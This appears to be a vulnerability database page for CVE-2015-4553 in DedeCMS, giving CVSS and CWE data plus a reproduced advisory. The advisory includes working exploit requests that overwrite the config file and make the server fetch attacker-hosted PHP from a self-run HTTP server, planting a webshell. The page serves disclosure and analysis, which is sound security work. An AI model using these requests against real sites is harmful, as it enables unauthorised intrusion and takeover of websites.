Vulnerabilities > CVE-2015-4553 - Unrestricted Upload of File with Dangerous Type vulnerability in Dedecms 5.5/5.6/5.7

CVSS 6.5 - MEDIUM

Attack vector

NETWORK

Attack complexity

LOW

Privileges required

SINGLE

Confidentiality impact

PARTIAL

Integrity impact

PARTIAL

Availability impact

PARTIAL

network

low complexity

dedecms

CWE-434

exploit available

NVD

Published: 2020-01-06

Updated: 2020-01-15

Summary

A file upload issue exists in DeDeCMS before 5.7-sp1, which allows malicious users getshell.

Vulnerable Configurations

Part	Description	Count
Application	Dedecms Dedecms Dedecms 5.5 Dedecms Dedecms 5.6 Dedecms Dedecms 5.7	4

Common Weakness Enumeration (CWE)

CWE-434 - Unrestricted Upload of File with Dangerous Type

Common Attack Pattern Enumeration and Classification (CAPEC)

Accessing Functionality Not Properly Constrained by ACLs
In applications, particularly web applications, access to functionality is mitigated by the authorization framework, whose job it is to map ACLs to elements of the application's functionality; particularly URL's for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application or can run queries for data that he is otherwise not supposed to.
Privilege Abuse
An adversary is able to exploit features of the target that should be reserved for privileged users or administrators but are exposed to use by lower or non-privileged accounts. Access to sensitive information and functionality must be controlled to ensure that only authorized users are able to access these resources. If access control mechanisms are absent or misconfigured, a user may be able to access resources that are intended only for higher level users. An adversary may be able to exploit this to utilize a less trusted account to gain information and perform activities reserved for more trusted accounts. This attack differs from privilege escalation and other privilege stealing attacks in that the adversary never actually escalates their privileges but instead is able to use a lesser degree of privilege to access resources that should be (but are not) reserved for higher privilege accounts. Likewise, the adversary does not exploit trust or subvert systems - all control functionality is working as configured but the configuration does not adequately protect sensitive resources at an appropriate level.

Exploit-Db

description	DedeCMS < 5.7-sp1 - Remote File Inclusion. CVE-2015-4553. Webapps exploit for php platform
id	EDB-ID:37423
last seen	2016-02-04
modified	2015-06-29
published	2015-06-29
reporter	zise
source	https://www.exploit-db.com/download/37423/
title	DedeCMS < 5.7-sp1 - Remote File Inclusion

Seebug

bulletinFamily	exploit
description	### 简要描述： 1.受影响版本DEDECMS 5.7、5.6、5.5。 2.漏洞文件/include/common.inc.php 3.DEDECMS的全局变量初始化存在漏洞，可以任意覆盖任意全局变量。 ### 漏洞危害： 1.黑客可以通过此漏洞来重定义数据库连接。 2.通过此漏洞进行各种越权操作构造漏洞直接写入webshell后门。
id	SSV:20949
last seen	2017-11-19
modified	2011-09-24
published	2011-09-24
reporter	feng
source	https://www.seebug.org/vuldb/ssvid-20949
title	DeDeCMS(织梦) 变量覆盖(CVE-2015-4553)

bulletinFamily	exploit
description	来源链接：http://seclists.org/fulldisclosure/2015/Jun/47 </br> http://blog.nsfocus.net/dedecms-write-file-vuln/ <p>0x00 <a href="http://blog.nsfocus.net/category/%e6%bc%8f%e6%b4%9e%e5%88%86%e6%9e%90/" target="_blank">漏洞</a>概述</p><p>2015年6月17日seclists网站上公布了Dedecms的一个远程getshell<a href="http://blog.nsfocus.net/category/%e6%bc%8f%e6%b4%9e%e5%88%86%e6%9e%90/" target="_blank">漏洞</a>细节，造成这个<a href="http://blog.nsfocus.net/category/%e6%bc%8f%e6%b4%9e%e5%88%86%e6%9e%90/" target="_blank">漏洞</a>的原因也有些让人玩味。官方已在2015年6月18日发布了修复版本，下载链接：<a href="http://www.dedecms.com/products/dedecms/downloads/" rel="nofollow">http://www.dedecms.com/products/dedecms/downloads/</a></p><p>本篇文章将分析这个<a href="http://blog.nsfocus.net/category/%e6%bc%8f%e6%b4%9e%e5%88%86%e6%9e%90/" target="_blank">漏洞</a>的成因，并给出触发利用方法。</p><h2>0x01 漏洞根源</h2><p>这个<a href="http://blog.nsfocus.net/category/%e6%bc%8f%e6%b4%9e%e5%88%86%e6%9e%90/" target="_blank">漏洞</a>主要由两个原因引起的，其中最重要的一个原因，便是开发者没有认识到Apache服务器解析文件的流程，从而导致安装文件在安装后居然可以被继续访问。这里接单解释下Apache解析文件的流程：</p><blockquote><p>当Apache检测到一个文件有多个扩展名时，如1.<a href="http://blog.nsfocus.net/tag/php/" target="_blank">php</a>.bak，会从右向左判断，直到有一个Apache认识的扩展名。如果所有的扩展名Apache都不认识，那么变会按照httpd.conf配置中所指定的方式展示这个问题，一般默认情况下是“text/plain”这种方式。</p><p>那么这样的话，像1.<a href="http://blog.nsfocus.net/tag/php/" target="_blank">php</a>.bak这样的文件名就会被当做<a href="http://blog.nsfocus.net/tag/php/" target="_blank">php</a>文件所解析。这也就是传说中的Apache解析<a href="http://blog.nsfocus.net/category/%e6%bc%8f%e6%b4%9e%e5%88%86%e6%9e%90/" target="_blank">漏洞</a>。</p></blockquote><p>了解了Apache解析<a href="http://blog.nsfocus.net/category/%e6%bc%8f%e6%b4%9e%e5%88%86%e6%9e%90/" target="_blank">漏洞</a>，我们就可以继续来看出问题的install/index.<a href="http://blog.nsfocus.net/tag/php/" target="_blank">php</a>.bak文件代码，问题代码如下：</p><p>[<a href="http://blog.nsfocus.net/tag/php/" target="_blank">php</a>]<br>else if($step==11)<br>{<br>require_once(‘../data/admin/config_update.<a href="http://blog.nsfocus.net/tag/php/" target="_blank">php</a>’);<br>$rmurl = $updateHost.”dedecms/demodata.{$s_lang}.txt”;<br>echo $rmurl;<br>$sql_content = file_get_contents($rmurl);<br>$fp = fopen($install_demo_name,’w’);<br>if(fwrite($fp,$sql_content))<br>echo ‘  <font color="green">[√]</font> 存在(您可以选择安装进行体验)';<br>else<br>echo ‘  <font color="red">[×]</font> 远程获取失败';<br>unset($sql_content);<br>fclose($fp);<br>exit();<br>[/<a href="http://blog.nsfocus.net/tag/php/" target="_blank">php</a>]</p><p>了解Dedecms参数机制的同学都知道，代码中的一些变量我们是可以通过GET参数的方式进行操控的。那么上面代码很明显，可以向指定的文件内写入任意内容，从而导致获取webshell。</p><h2>0x02 漏洞利用</h2><p>从代码中我们可以看到在step=11中，先包含了data/admin/config_update.<a href="http://blog.nsfocus.net/tag/php/" target="_blank">php</a>文件，这文件中指定了updataHost变量的值，这样来看似乎我们没有办法来向指定写内容。但是如果我们指定install_demo_name是config_update.<a href="http://blog.nsfocus.net/tag/php/" target="_blank">php</a>文件这个文件，并且内容是一个404文件，会造成什么效果呢？</p><p>我们先来访问这个url:<a href="http://192.168.204.135/install/index." rel="nofollow">http://192.168.204.135/install/index.</a><a href="http://blog.nsfocus.net/tag/php/" target="_blank">php</a>.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/admin/config_update.<a href="http://blog.nsfocus.net/tag/php/" target="_blank">php</a></p><p>这会让代码到<a href="http://updatenew.dedecms.com/base-v57/dedecms/demodata.a.txt" rel="nofollow">http://updatenew.dedecms.com/base-v57/dedecms/demodata.a.txt</a>中取内容写入到config_update.<a href="http://blog.nsfocus.net/tag/php/" target="_blank">php</a>，demodata.a.txt如下图：</p><p><img src="http://blog.nsfocus.net/wp-content/uploads/2015/07/demodata.a.txt-300x119.jpg" alt="demodata.a.txt" width="300" height="119"></p><p>访问PoC之后config_update.<a href="http://blog.nsfocus.net/tag/php/" target="_blank">php</a>文件内容如下图：</p><p><img src="http://blog.nsfocus.net/wp-content/uploads/2015/07/config_update.php_.jpg"></p><p>这样updataHost变量值便没有被初始化了，之后我们想写什么就可以些什么了。这里我们用下面的这个url做测试:<a href="http://192.168.204.135/install/index." rel="nofollow">http://192.168.204.135/install/index.</a><a href="http://blog.nsfocus.net/tag/php/" target="_blank">php</a>.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=../data/tang3.<a href="http://blog.nsfocus.net/tag/php/" target="_blank">php</a>&updateHost=<a href="http://192.168.1.1/" rel="nofollow">http://192.168.1.1/</a></p><p>访问<a href="http://192.168.204.135/data/tang3." rel="nofollow">http://192.168.204.135/data/tang3.</a><a href="http://blog.nsfocus.net/tag/php/" target="_blank">php</a>，效果如下图：</p><p><img src="http://blog.nsfocus.net/wp-content/uploads/2015/07/payload-300x150.jpg" alt="payload" width="300" height="150"></p><h2>0x03 漏洞总结</h2><h3>漏洞小结</h3><ol><li><p>影响范围个人评价为“高”，Dedecms在国内使用范围很广，各种中小型网站，政府网站都是用它搭建的。</p></li><li><p>危害性个人评价为“高”，此<a href="http://blog.nsfocus.net/category/%e6%bc%8f%e6%b4%9e%e5%88%86%e6%9e%90/" target="_blank">漏洞</a>在Apache默认环境下，即可获取webshell，危害很大。</p></li></ol><h3><br></h3> </br><h3>补充内容：</h3> ############################################################################# <p>[CVE-2015-4553]Dedecms variable coverage leads to getshell</p><p># CVE ID:   CVE-2015-4553</p><p># Subject:   Dedecms variable coverage leads to getshell</p><p># Author:   zise</p><p># Date:     06.17.2015</p><p>#############################################################################</p><p>Introduction:</p><p>========</p><p>dedecms Open source cms</p><p>Extensive application</p><p>  </p><p>Influence version</p><p>Newest dedecms 5.7-sp1 and all old version</p><p> </p><p> </p><p>Remote getshell</p><p>Details:</p><p>=======</p><p>After the default installation of dedecms</p><p>Installation directory 安装路径说明</p><p>/install/index.php</p><p>or</p><p>/install/index.php.bak</p><p>  </p><p>/install/index.php //run iis apache exploit</p><p>/install/index.php.bak //run apache exploit</p><p><b>Code analysis 源码分析</b>：</p><p>/install/index.php.bak?install_demo_name=aaaa&insLockfile=bbbb</p><p>###########index.php.bak 的源码分析###########################################</p><p>17 $install_demo_name = 'dedev57demo.txt';</p><p>18 $insLockfile = dirname(__FILE__).'/install_lock.txt';</p><p> </p><p>// here $install_demo_name and $insLockfile definition 变量定义并初始化</p><p>// echo $install_demo_name;  printf dedev57demo.txt</p><p> </p><p>29 foreach(Array('_GET','_POST','_COOKIE') as $_request)</p><p>30 {</p><p>31    foreach($$_request as $_k => $_v) ${$_k} = RunMagicQuotes($_v);</p><p>32 }</p><p> </p><p>// echo $install_demo_name; printf aaaa 变量内容被覆盖,这就是漏洞所在了</p><p>// $install_demo_name by variable coverage</p><p>#############################################################################</p><p> </p><p><b> </b></p><p><b> 漏洞利用方法：</b></p><p>  </p><p>GETSHELL Step 1 Clear file contents config_update.php</p><p>#############################################################################</p><p>config_update.php </p><p>13 $updateHost = '<a href="http://updatenew.dedecms.com/base-v57/" rel="nofollow">http://updatenew.dedecms.com/base-v57/</a>';</p><p>14 $linkHost = '<a href="http://flink.dedecms.com/server_url.php" rel="nofollow">http://flink.dedecms.com/server_url.php</a>';</p><p> </p><p>//In order to obtain the webshell need to control $updateHost</p><p>//So the use of variable coverags cleared config_update.php</p><p>// 通过漏洞来覆盖$updatehost的值。具体方法就是使用下面这个url。</p><p> </p><p><a href="http://192.168.204.135/install/index.php.bak" rel="nofollow">http://192.168.204.135/install/index.php.bak</a></p><p>?step=11</p><p>&insLockfile=a</p><p>&s_lang=a</p><p>&install_demo_name=../data/admin/config_update.php</p><p><br></p><p>########这段代码的作用是文件内容copy#############</p><p>373 else if($step==11)</p><p>374 {</p><p>375 require_once('../data/admin/config_update.php');</p><p>376 $rmurl = $updateHost."dedecms/demodata.{$s_lang}.txt";</p><p>377</p><p>378 $sql_content = file_get_contents($rmurl);</p><p>379 $fp = fopen($install_demo_name,'w'); //向文件中写入语句</p><p>380 if(fwrite($fp,$sql_content))</p><p>381 echo '&nbsp; <font color="green">[√]</font> 存在(您可以选择安装进行体验)';</p><p>382 else</p><p>383 echo '&nbsp; <font color="red">[×]</font> 远程获取失败';</p><p>384 unset($sql_content);</p><p>385 fclose($fp);</p><p>386 exit();</p><p>387 }</p><p> </p><p>#根据以上代码，下面的URL访问的结果就是向/data/admin/config_update.php文件中写入<a href="http://updatenew.dedecms.com/base-v57/" rel="nofollow">http://updatenew.dedecms.com/base-v57/</a>dedecms/demodata.a.txt文件的内容。</p><p><a href="http://192.168.204.135/install/index.php.bak" rel="nofollow">http://192.168.204.135/install/index.php.bak</a></p><p>?step=11</p><p>&insLockfile=a</p><p>&s_lang=a</p><p>&install_demo_name=../data/admin/config_update.php</p><p>###</p><p>HTTP/1.1 200 OK</p><p>Date: Wed, 17 Jun 2015 06:55:23 GMT</p><p>Server: Apache/2.4.12</p><p>X-Powered-By: PHP/5.6.6</p><p>Vary: User-Agent</p><p>Content-Length: 55</p><p>Keep-Alive: timeout=5, max=100</p><p>Connection: Keep-Alive</p><p>Content-Type: text/html; charset=utf-8</p><p>  </p><p>  <font color="red">[×]</font> 远程获取失败</p><p>###访问的响应包,之所以访问失败，是因为<a href="http://updatenew.dedecms.com/base-v57/" rel="nofollow">http://updatenew.dedecms.com/base-v57/</a>dedecms/demodata.a.txt 的内容不存在。####</p><p> </p><p> </p><p> </p><p> </p><p>###After execution file 0 byte ~ho~year~####</p><p>2015/06/17  14:55                 0 config_update.php</p><p>               1 file              0 byte</p><p> </p><p> </p><p>  </p><p>GETSHELL Step 2</p><p>#############################################################################</p><p>Create local HTTP services #自己部署一个本地http服务器，下面是命令和输出。</p><p>  </p><p>zise:tmp zise$ ifconfig en0</p><p>en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500</p><p>inet 119.253.3.18 netmask 0xffffff00 broadcast </p><p>  </p><p>zise:tmp zise$ mkdir "dedecms"</p><p>zise:tmp zise$ cd dedecms/</p><p>zise:dedecms zise$ echo "<?php phpinfo();?>" > demodata.a.txt</p><p>zise:dedecms zise$ cd ../</p><p>zise:tmp zise$ python -m SimpleHTTPServer</p><p>Serving HTTP on 0.0.0.0 port 8000 ...</p><p>192.168.204.135 - - [17/Jun/2015 15:11:18] "GET /dedecms/demodata.a.txt HTTP/1.0" 200 -</p><p>##创建了http服务器，并且有一个可以访问的文本，其中的内容是显示phpinfo。</p><p>  </p><p>####</p><p><a href="http://192.168.204.135/install/index.php.bak" rel="nofollow">http://192.168.204.135/install/index.php.bak</a></p><p>?step=11</p><p>&insLockfile=a</p><p>&s_lang=a</p><p>&install_demo_name=hello.php</p><p>&updateHost=<a href="http://119.253.3.18:8000/" rel="nofollow">http://119.253.3.18:8000/</a></p><p>##url后跟的参数都是由这个URL对应的php页面来处理的吧</p><p>##访问的结果就是向/data/admin/hello.php文件中写入<a href="http://119.253.3.18:8000/" rel="nofollow">http://119.253.3.18:8000/</a> 中"dedecms/demodata.a.txt"文件的内容。</p><p> </p><p>####</p><p>  </p><p>HTTP/1.1 200 OK</p><p>Date: Wed, 17 Jun 2015 07:11:18 GMT</p><p>Server: Apache/2.4.12</p><p>X-Powered-By: PHP/5.6.6</p><p>Vary: Accept-Encoding,User-Agent</p><p>Content-Length: 81</p><p>Keep-Alive: timeout=5, max=100</p><p>Connection: Keep-Alive</p><p>Content-Type: text/html; charset=utf-8</p><p>  </p><p>  <font color="green">[√]</font> 存在(您可以选择安装进行体验)</p><p> </p><p> </p><p>再来看前面那段index.php.bak的源码：</p><p>373 else if($step==11)</p><p>374 {</p><p>375 require_once('../data/admin/config_update.php');</p><p>376 $rmurl = $updateHost."dedecms/demodata.{$s_lang}.txt";</p><p>377</p><p>378 $sql_content = file_get_contents($rmurl);</p><p>379 $fp = fopen($install_demo_name,'w');</p><p>380 if(fwrite($fp,$sql_content))  //fwrite websehll 文件写入就是这里发生的，写入的内容则由自己控制的文本确定。</p><p>381 echo '&nbsp; <font color="green">[√]</font> 存在(您可以选择安装进行体验)';</p><p>382 else</p><p>383 echo '&nbsp; <font color="red">[×]</font> 远程获取失败';</p><p>384 unset($sql_content);</p><p>385 fclose($fp);</p><p>386 exit();</p><p>387 }</p><p>  </p><p><a href="http://192.168.204.135/install/hello.php#" rel="nofollow">http://192.168.204.135/install/hello.php#</a>这就是webshell的页面</p><p> </p><p>This is the vulnerability of some web pages</p><p><a href="http://seclists.org/fulldisclosure/2015/Jun/47">http://seclists.org/fulldisclosure/2015/Jun/47</a></p><p>所以,利用只需一步，访问这个url即可：</p><p>http://目标IP/install/index.php.bak?step=11&insLockfile=a&s_lang=a&install_demo_name=hello.php&updateHost=http://自己控制的http服务器/</p>
id	SSV:89354
last seen	2017-11-19
modified	2015-09-07
published	2015-09-07
reporter	拿破轮胎
title	Dedecms远程写文件漏洞

Summary

Vulnerable Configurations

Common Weakness Enumeration (CWE)

Common Attack Pattern Enumeration and Classification (CAPEC)

Exploit-Db

Seebug

References